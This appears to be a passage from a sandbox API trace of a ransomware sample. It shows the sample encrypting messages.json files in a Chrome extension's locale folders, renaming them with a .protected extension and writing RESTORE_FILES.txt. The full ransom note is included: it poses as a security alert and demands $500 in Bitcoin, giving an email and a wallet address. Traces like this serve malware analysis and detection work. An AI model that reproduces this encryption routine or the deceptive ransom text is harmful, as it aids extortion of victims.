FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.088] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.088] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.088] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.088] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.090] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.090] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.090] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.090] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x26e, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.091] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x26e, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.091] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.092] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.092] CloseHandle (hObject=0x168) returned 1 [0081.092] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.protected") returned 169 [0081.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.protected")) returned 1 [0081.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.093] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\RESTORE_FILES.txt") returned 163 [0081.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.093] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.093] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.094] lstrlenA (lpString="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") returned 684 [0081.094] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.094] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.094] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.094] CloseHandle (hObject=0x164) returned 1 [0081.094] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0081.094] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja") returned 145 [0081.094] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0081.094] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0081.094] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\*") returned 147 [0081.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.095] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.095] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.095] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\.") returned 147 [0081.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.095] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.095] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.095] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.095] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.095] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.095] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\..") returned 148 [0081.095] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.095] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.095] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.095] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.095] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.095] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.095] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.096] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.096] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.096] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.096] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x30a, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffcf6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.102] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x30a, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.102] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.102] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.102] CloseHandle (hObject=0x168) returned 1 [0081.102] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.protected") returned 169 [0081.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.protected")) returned 1 [0081.103] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.103] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.103] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\RESTORE_FILES.txt") returned 163 [0081.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.104] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.104] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.104] lstrlenA (lpString="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") returned 684 [0081.104] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.104] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.104] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.105] CloseHandle (hObject=0x164) returned 1 [0081.105] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0081.105] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko") returned 145 [0081.105] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0081.105] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0081.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\*") returned 147 [0081.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.105] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.105] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.105] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.105] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.105] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\.") returned 147 [0081.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.105] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.106] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.106] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.106] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.106] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.106] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.106] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\..") returned 148 [0081.106] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.106] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.106] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.106] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.106] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.106] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.106] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.106] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.107] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
